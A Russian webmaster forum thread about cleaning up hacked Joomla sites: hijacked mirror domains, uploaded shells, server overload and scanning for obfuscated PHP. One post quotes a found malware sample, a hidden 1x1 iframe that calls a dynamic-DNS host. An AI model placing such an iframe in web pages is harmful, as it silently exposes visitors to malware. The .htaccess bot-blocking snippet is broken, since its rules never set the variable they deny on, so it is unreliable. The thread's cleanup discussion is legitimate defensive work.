draff

draff
Рейтинг
65
Регистрация
30.03.2010
Должность
freelance
Интересы
web

У клиента так и стал чужой домен ,зеркалом. А в Я.веб-мастер приходило письмо о зеркале ?

Есть возможность запуска пхп ?

На всяк случай ссылка воть

Правда аваст ругается теперь на ссылку,хотя вчера было норма. ))

п.с.

Добавлю и "свой" малвар.А вдруг кто встречал.

<iframe src="http://kxqiisto.sytes.net:12601/forum/t/linktous.php?guardian=82" width=1 height=1 style="visibility: hidden">

SeoPerez,

А малвар такой же ?

Проверьте сканером http://sitecheck.sucuri.net/scanner/

GISIR:
На античат он может обратиться лишь для того чтобы его сервер взломали еще раз 10.

Так ТС сам даст доступ. ))

Как вариант- удалят чужие шеллы,а потом зальют свой и будут продавать шелл,там же на античате.

poruchick:
Нет, рип полноценный с изменёнными логином/паролем админа.

Значит через шелл слили файлы и БД.

happy-joker:

Сегодня начались проблемы с доступностью сайта. Хостер сказал, что нагрузку создают поисковые боты.
Что можно еще сделать?

Закрыть админку сайта,использовав http-авторизацию в nginx.

.htaccess

#Блокируем плохих ботов и роботов
SetEnvIfNoCase user-Agent ^FrontPage [NC,OR]
SetEnvIfNoCase user-Agent ^Java.* [NC,OR]
SetEnvIfNoCase user-Agent ^Microsoft.URL [NC,OR]
SetEnvIfNoCase user-Agent ^MSFrontPage [NC,OR]
SetEnvIfNoCase user-Agent ^Offline.Explorer [NC,OR]
SetEnvIfNoCase user-Agent ^[Ww]eb[Bb]andit [NC,OR]
SetEnvIfNoCase user-Agent ^Zeus [NC]
<limit get="" post="" head="">
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</limit>

Проверено на VPS клиента.Тоже были письма от хостера о превышении нагрузки,и лог доступ под 4.5 гиг

Отключи com_mailto или пропиши проверку на авторизацию.

Не поможет,ищи шелл.

Включить показ X-PHP-Originating-Script

http://php.net/manual/ru/mail.configuration.php

Странный хостер, не хочет удалять левые файлы с вредоносным кодом.

Нужно обновить Джумла до 1.5.26. Это легче сделать,и по времени и по деньгам.

gashekk:
Просканил.
Найдены длинные зашифрованные последовательности в PHP или подключение внешних файлов.
Что с ними всеми делать? искать ручками и править?

Если очень длинный набор символов,то удаляй.

Всего: 139